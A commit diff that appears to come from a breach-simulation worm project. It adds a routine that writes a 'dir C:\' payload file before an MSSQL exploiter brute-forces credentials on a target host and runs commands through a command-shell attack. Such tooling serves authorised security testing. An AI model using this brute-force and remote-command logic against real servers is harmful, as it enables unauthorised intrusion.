- Added dynamic file creation on runtime instead of a static payload file
This commit is contained in:
parent
0bfde8d047
commit
dfe6cf073e
|
@ -22,6 +22,21 @@ class MSSQLExploiter(HostExploiter):
|
|||
self._config = __import__('config').WormConfiguration
|
||||
self.attacks_list = [mssqlexec_utils.CmdShellAttack]
|
||||
|
||||
@staticmethod
|
||||
def create_payload_file(payload_path=DEFAULT_PAYLOAD_PATH):
|
||||
"""
|
||||
This function creates dynamically the payload file to be transported and ran on the exploited machine.
|
||||
:param payload_path: A path to the create the payload file in
|
||||
:return: True if the payload file was created and false otherwise.
|
||||
"""
|
||||
try:
|
||||
with open(payload_path, 'w+') as payload_file:
|
||||
payload_file.write('dir C:\\')
|
||||
return True
|
||||
except Exception as e:
|
||||
LOG.error("Payload file couldn't be created", exec_info=True)
|
||||
return False
|
||||
|
||||
def exploit_host(self):
|
||||
"""
|
||||
Main function of the mssql brute force
|
||||
|
@ -29,6 +44,9 @@ class MSSQLExploiter(HostExploiter):
|
|||
True or False depends on process success
|
||||
"""
|
||||
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
||||
|
||||
if not MSSQLExploiter.create_payload_file():
|
||||
return False
|
||||
if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
|
||||
self.DEFAULT_PAYLOAD_PATH):
|
||||
LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))
|
||||
|
|
Loading…
Reference in New Issue